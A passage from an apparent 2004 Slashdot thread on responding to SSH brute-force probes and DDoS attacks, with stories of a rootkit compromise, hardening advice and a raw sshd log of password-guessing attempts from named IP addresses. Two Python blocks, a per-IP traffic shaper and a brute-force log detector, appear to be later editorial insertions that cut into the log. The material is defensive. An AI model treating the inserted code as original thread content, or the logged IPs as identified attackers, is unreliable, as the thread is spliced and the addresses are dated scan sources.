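        held back; 0.0 means it goes out at full speed. Tokens may go negative,
        which models the packets queued behind the slow drip."""
        self.tokens = min(self.capacity, self.tokens + (now - self.last) * self.rate)
        self.last = now
        self.tokens -= nbytes
        return max(0.0, -self.tokens / self.rate)


class PerIpShaper:
    """Keeps an independent bucket per source address, so one abuser draining
    his bucket does not slow down anybody else."""

    def __init__(self, capacity=500_000, rate=5_000):
        self.capacity, self.rate = capacity, rate
        self.buckets = {}

    def request(self, ip, nbytes, now):
        bucket = self.buckets.setdefault(ip, TokenBucket(self.capacity, self.rate))
        return bucket.request(nbytes, now)


def delays(shaper, ip, transfers):
    """Run a list of (time, bytes) page loads for one client and return the
    delay imposed on each."""
    return [shaper.request(ip, nbytes, t) for t, nbytes in transfers]


if __name__ == "__main__":
    shaper = PerIpShaper()
    # Constructed scenarios (RFC 5737 addresses): a reader who loads one page
    # and comes back 100 s later, and an F5-holder reloading a 200K page every second.
    print(delays(shaper, "192.0.2.1", [(0, 500_000), (100, 500_000)]))               # [0.0, 0.0]
    print(delays(shaper, "192.0.2.2", [(0, 200_000), (1, 200_000), (2, 200_000)]))   # [0.0, 0.0, 18.0]
    print(delays(shaper, "192.0.2.3", [(2, 500_000)]))                               # [0.0], others unaffected
```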
  • by hankwang ( 413283 ) * on Friday August 13, 2004 @04:49AM (#9956666) Homepage
    Let me tell you a true story.

    Back in January 1999 when everybody used telnet for remote logins, several computers in our department were root-compromised and had a rootkit installed (password sniffer, backdoors, and patched versions of ps, ls, and such to prevent being detected). We noticed some strange activities but had no clue what was going on, thinking that other people were trying to intrude us, while actually the cracker used our computers to intrude other people. It felt a bit like being in a thriller, where we step by step discovered what was going on, culminating in a session where we witnessed live how the cracker was logged in on one computer, from which he tried logging in on a second computer where we already had changed all passwords. We contacted the internet provider (he was behind an IP-masquerading firewall) and a university where he apparently illegally had plugged in a computer on the network and of course the cracker had been reading a number of emails before we finally locked down our systems.

    Since then, our computers got enormous attention from crackers, while suspicious messages appeared much more seldom in other people's log files. This cracker was severely pissed off. We were compromised several times after that. Once, the presence of a rootkit revealed itself through the fact that an ls option wasn't working anymore. We repaired the situation and removed telnet/ftp from the computer (they had suspicious log file messages), not knowing that it was the outdated sshd that caused the trouble. After the weekend, the owner of the computer came to me complaining that he couldn't log in. It turned out that the intruder wiped his whole home directory, which had no recent back-up! I cannot believe that a cracker does something like that for any other reason than pure revenge.

    These incidents have taught me the value of staying up-to-date. What I wanted to tell here is: don't let the cracker know that it was you who caused them trouble or you might get repercussions. Oh, and note that I am not a professional system administrator; I was a PhD student who happened to know a bit more about Linux than most others.

  • by kinema ( 630983 ) on Friday August 13, 2004 @04:51AM (#9956672)
    I'm surprised nobody has suggested this before but I would recommend a tactical nuclear strike against the intruder. I've found that this simple step typically quells the attack.
  • by smoon ( 16873 ) on Friday August 13, 2004 @05:25AM (#9956770) Homepage
    Don't you use a firewall? You can't attempt to log in remotely if you're blocking the typical remote access ports -- SSH, telnet, etc.

    So you've got a machine sitting on the internet, home to a million and one active worms, and are surprised that it gets scanned constantly?

    Don't bother with the abuse reports -- more than likely it's just worm activity from computers whose clueless owners don't realize have been infected. A more recent one attempts SSH logins, which may be what you're seeing.

    If it was a _real_ crack attempt then you:
    1: Wouldn't know about it.
    2: Would be unable to pin it down. It would be bounced through several victim networks, so your ability to see where it's "coming from" is really just the last victim machine in the chain.

    Third possibility is script kiddies, in which case you would know about it and where they were coming from, but they would have no chance of success unless you are unwilling to keep up on patches and follow basic security practices like decent passwords.

    Best would be to close off remote-login ports altogether. If you need remote login then block for all but the address range you'd be coming from. If you need remote access from random locations, then at least consider using a heavily locked down system (e.g.: OpenBSD) or work _really hard_ to get your systems firewall/logging/etc. set up well.

    One OpenBSD/pf feature you might be interested in (also available from other systems) is the ability to tie Snort into the pf ruleset so that remote scanners, once detected, are ignored.
  • by KlausBreuer ( 105581 ) on Friday August 13, 2004 @08:57AM (#9957587) Homepage

    The online cartoons - once again - show us how the world works. Here you can find the difference between Hollywood's form of dealing with intruders, and The Real World's:

    Bigger Than Cheese [biggercheese.com]
  • Document Everything (Score:5, Informative)

    by catdevnull ( 531283 ) on Friday August 13, 2004 @09:36AM (#9957904)
    Data integrity is more important than catching them. Remember that first.

    1) Make notes about what you've found
    2) Report the abuse as per the WHOIS info for the offenders
    3) Block their IPs at your border

    If you're using a firewall, great. If not--get one.
    If you haven't read Frisch's "Essential System Administration" read it:
    http://www.oreilly.com/catalog/esa3/index.html

    If you haven't read Stephen Northcutt's "Network Intrusion Detection" you should probably give it a good read as well:
    http://www.amazon.com/exec/obidos/tg/detail/-/0735708681/104-7409931-6853536?v=glance

    There are some good articles all over the web regarding Linux security. A few google searches will help uncover them.

    Patch. It's not just for Windows.

    Limit services with ACLs and host restriction.

    Harden your system by partitioning read/write slices away from static mountpoints where your binaries are by mounting the read only ones as read only.

    chattr +i on your binaries--makes it tougher for skript kiddies.

    Talk to other admins--every day is a school day.

    AND

    Face the fact that you're not as smart as the crackers so you just have to create layers of security that keep you from being an easy target.
  • Post IPs! (Score:4, Informative)

    by Bobzibub ( 20561 ) on Friday August 13, 2004 @10:08AM (#9958262)
    What the hell! Why not?

    Aug 12 05:08:28 pokey sshd[7534]: Illegal user test from ::ffff:203.186.65.92
    Aug 12 05:08:31 pokey sshd[7534]: Failed password for illegal user test from ::ffff:203.186.65.92 port 4570 ssh2
    Aug 12 10:51:33 pokey sshd[7615]: Illegal user test from ::ffff:217.115.83.1
    Aug 12 10:51:35 pokey sshd[7615]: Failed password for illegal user test from ::ffff:217.115.83.1 port 39378 ssh2
    Aug 12 10:51:39 pokey sshd[7617]: Illegal user guest from ::ffff:217.115.83.1
    Aug 12 10:51:41 pokey sshd[7617]: Failed password for illegal user guest from ::ffff:217.115.83.1 port 39462 ssh2
    Aug 12 10:51:48 pokey sshd[7619]: Illegal user admin from ::ffff:217.115.83.1
    Aug 12 10:51:50 pokey sshd[7619]: Failed password for illegal user admin from ::ffff:217.115.83.1 port 39609 ssh2
    Aug 12 10:51:54 pokey sshd[7621]: Illegal user admin from ::ffff:217.115.83.1
    Aug 12 10:51:57 pokey sshd[7621]: Failed password for illegal user admin from ::ffff:217.115.83.1 port 39742 ssh2
    Aug 12 10:52:01 pokey sshd[7623]: Illegal user user from ::ffff:217.115.83.1
    Aug 12 10:52:03 pokey sshd[7623]: Failed password for illegal user user from ::ffff:217.115.83.1 port 39878 ssh2
    Aug 12 10:52:10 pokey sshd[7625]: Failed password for root from ::ffff:217.115.83.1 port 40005 ssh2
    Aug 12 10:52:16 pokey sshd[7627]: Failed password for root from ::ffff:217.115.83.1 port 40145 ssh2
    Aug 12 10:52:23 pokey sshd[7629]: Failed password for root from ::ffff:217.115.83.1 port 40277 ssh2
    Aug 12 10:52:27 pokey sshd[7631]: Illegal user test from ::ffff:217.115.83.1
    Aug 12 10:52:29 pokey sshd[7631]: Failed password for illegal user test from ::ffff:217.115.83.1 port 40412 ssh2
    Aug 12 11:01:41 pokey sshd[7659]: Illegal user test from ::ffff:217.115.83.1
    Aug 12 11:01:44 pokey sshd[7659]: Failed password for illegal user test from ::ffff:217.115.83.1 port 49595 ssh2
    Aug 12 11:01:48 pokey sshd[7661]: Illegal user guest from ::ffff:217.115.83.1
    Aug 12 11:01:50 pokey sshd[7661]: Failed password for illegal user guest from ::ffff:217.115.83.1 port 49726 ssh2
    Aug 12 11:01:54 pokey sshd[7663]: Illegal user admin from ::ffff:217.115.83.1
    Aug 12 11:01:57 pokey sshd[7663]: Failed password for illegal user admin from ::ffff:217.115.83.1 port 49861 ssh2
    Aug 12 11:02:01 pokey sshd[7665]: Illegal user admin from ::ffff:217.115.83.1
    Aug 12 11:02:03 pokey sshd[7665]: Failed password for illegal user admin from ::ffff:217.115.83.1 port 49983 ssh2
    Aug 12 11:02:07 pokey sshd[7667]: Illegal user user from ::ffff:217.115.83.1
    Aug 12 11:02:10 pokey sshd[7667]: Failed password for illegal user user from ::ffff:217.115.83.1 port 50117 ssh2
    Aug 12 11:02:16 pokey sshd[7669]: Failed password for root from ::ffff:217.115.83.1 port 50257 ssh2
    Aug 12 11:02:22 pokey sshd[7671]: Failed password for root from ::ffff:217.115.83.1 port 50398 ssh2
    Aug 12 11:02:29 pokey sshd[7673]: Failed password for root from ::ffff:217.115.83.1 port 50546 ssh2
    Aug 12 11:02:33 pokey sshd[7675]: Illegal user test from ::ffff:217.115.83.1
    Aug 12 11:02:35 pokey sshd[7675]: Failed password for illegal user test from ::ffff:217.115.83.1 port 50678 ssh2
    Aug 12 12:23:19 pokey sshd[7703]: Illegal user test from ::ffff:202.129.52.50
    Aug 12 12:23:22 pokey sshd[7703]: Failed password for illegal user test from ::ffff:202.129.52.50 port 3258 ssh2
    Aug 12 12:23:26 pokey sshd[7705]: Illegal user guest from
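    Detection logic for sshd lines in the format posted above, as an added example that is not part of the post: it counts "Failed password" lines per source address, records the usernames tried, and flags sources that show the rapid dictionary pattern (many failures inside a short window) rather than a user mistyping a password once. The sample lines are constructed and use RFC 5737 documentation addresses, not the IPs from the post.

```python
import re
from datetime import datetime

# Constructed sample in the format of the sshd lines posted above (RFC 5737
# documentation addresses, not the IPs from the post).
SAMPLE_LOG = """\
Aug 12 10:51:33 pokey sshd[7615]: Illegal user test from ::ffff:192.0.2.10
Aug 12 10:51:35 pokey sshd[7615]: Failed password for illegal user test from ::ffff:192.0.2.10 port 39378 ssh2
Aug 12 10:51:41 pokey sshd[7617]: Failed password for illegal user guest from ::ffff:192.0.2.10 port 39462 ssh2
Aug 12 10:51:50 pokey sshd[7619]: Failed password for illegal user admin from ::ffff:192.0.2.10 port 39609 ssh2
Aug 12 10:52:10 pokey sshd[7625]: Failed password for root from ::ffff:192.0.2.10 port 40005 ssh2
Aug 12 10:52:16 pokey sshd[7627]: Failed password for root from ::ffff:192.0.2.10 port 40145 ssh2
Aug 12 11:30:02 pokey sshd[7701]: Accepted publickey for alice from ::ffff:198.51.100.7 port 50001 ssh2
Aug 12 12:23:22 pokey sshd[7703]: Failed password for illegal user test from ::ffff:198.51.100.7 port 3258 ssh2
"""

# Every "Illegal user" line is followed by a "Failed password" line for the
# same attempt, so counting only the latter avoids double counting.
FAILED = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for "
    r"(?:illegal user )?(?P<user>\S+) from (?:::ffff:)?(?P<ip>[\d.]+) port \d+"
)

def parse_failure(line):
    """Return (timestamp, user, ip) for a failed-password line, else None.
    Syslog has no year; strptime defaults to 1900, which is fine for
    differences between lines of the same log."""
    m = FAILED.match(line)
    if not m:
        return None
    return datetime.strptime(m.group("ts"), "%b %d %H:%M:%S"), m.group("user"), m.group("ip")

def summarize(log_text):
    """Per source IP: failure count, usernames tried and sorted failure times."""
    stats = {}
    for line in log_text.splitlines():
        parsed = parse_failure(line)
        if parsed is None:
            continue
        ts, user, ip = parsed
        s = stats.setdefault(ip, {"failures": 0, "users": set(), "times": []})
        s["failures"] += 1
        s["users"].add(user)
        s["times"].append(ts)
    for s in stats.values():
        s["times"].sort()
    return stats

def brute_force_sources(log_text, threshold=5, window_seconds=600):
    """IPs with at least `threshold` failures inside some `window_seconds` span
    (sliding window over the sorted times): the scan pattern in the post, not a
    legitimate user who mistyped a password once."""
    flagged = []
    for ip, s in summarize(log_text).items():
        times, start = s["times"], 0
        for end, t in enumerate(times):
            while (t - times[start]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 >= threshold:
                flagged.append(ip)
                break
    return sorted(flagged)
```

The flagged list is what you would hand to the firewall block rule or the abuse report; the per-IP summary gives the usernames and times to quote in it.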
  • by dougmc ( 70836 ) <dougmc+slashdot@frenzied.us> on Friday August 13, 2004 @11:30AM (#9959207) Homepage
    I've had problems with this a lot myself. Not intrusion attempts, but DDoS attacks. Apparently people want my nickname on IRC, and think that hitting me with a DDoS attack until I drop off is an acceptable way of freeing it up for their own use. It's not so bad when they just go after my cable modem, but they've also gone after the place that I work at, even when I'm not IRCing from there at the time, and that's much much worse. Also, they often don't attack for the needed ten minutes -- I've had attacks going on for 15 hours, and perhaps even longer but at that point I had the ISP filter out the traffic for me.

    So, being a good guy, I never respond in kind (I could, but 1) it's wrong, 2) it affects more than just the target and 3) I don't feel like going to pound-me-in-the-ass prison), I just log every single packet I can, and when the attack is over find the worst offenders (typically the packets are not spoofed) and use Spamcop and whois to find the responsible parties for each one, and send them all an email.

    Many (most?) emails elicit an automatic response.

    Perhaps 10% get a personalized response, but usually this response says that I should contact the ISP of the offender (when in fact that's exactly what I'm doing.) Perhaps half of the responses I do get say they'll do something about it, which is good -- usually these are compromised drone/zombie machines, and need cleaning anyways.

    Quite often, the attacker is stupid enough to ping my machine from his home machine (so he can see how it's going), not thinking I'll notice that. When this happens, I can also email his home ISP, the people who really know who he is, and the people who can really hit him where it hurts. Except that they ignore my email too, and if they do email me back, they just tell me that the attack did not come from their ISP so they can't do anything, or there's no proof that the pinging is related to the attack.

    Phone calls are much more effective than emails, but you really need to make them during the attack for them to take them seriously. And often the attacks happen outside of business hours, so there's nobody to call. And they're very time consuming.

    Though I did succeed in nailing at least one guy. He was in Romania, and he messaged me a few weeks after the attack basically pleading with me that it wasn't him, but his brother using his computer. Apparently the police (in Romania) were questioning him, and one of the things they showed him was my email. The police had never contacted me -- I'm guessing that my email was just one of many pieces of evidence they had against the guy. I felt a bit bad for him, but not that bad. Not that I had any control over what was happening to him at that point -- it was out of my hands the moment I sent my email.

    So, if it happens again, I'll do the same thing. I know it's not likely that anything substantial will come from my emails, but there's still a chance. Every time it happens, I know I nail at least some of his compromised machines, and have a chance at getting him. I'll win eventually -- either that, or he'll hit puberty, in which case we both win.

  • by argoff ( 142580 ) on Friday August 13, 2004 @11:52AM (#9959455)
    Chances are that you are not being directly hacked, but automatically probed by a system that already has a root-kit installed.

    There are a lot of people out there who have no idea that their computer is infected with a root-kit and many would be grateful to be told so.
